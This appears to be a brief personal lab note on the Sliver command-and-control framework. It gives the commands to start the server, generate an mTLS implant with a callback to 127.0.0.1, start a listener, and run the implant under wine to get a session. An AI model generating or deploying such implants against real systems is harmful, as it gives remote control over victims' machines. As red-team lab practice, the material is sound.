Sliver: Generating an implant
Generate a new implant
mkdir -p ~/Desktop/op/sliver/implants
cd ~/Desktop/op/sliver
sliver-server_linux
We should now be in a sliver
shell.
Now we can generate a test implant:
generate --mtls 127.0.0.1 --save implants/default-sliver.exe
Testing implant
In the sliver shell:
mtls
In a new terminal window:
wine ~/Desktop/op/sliver/implants/default-sliver.exe
Now we can use the implant by calling use [session id]
: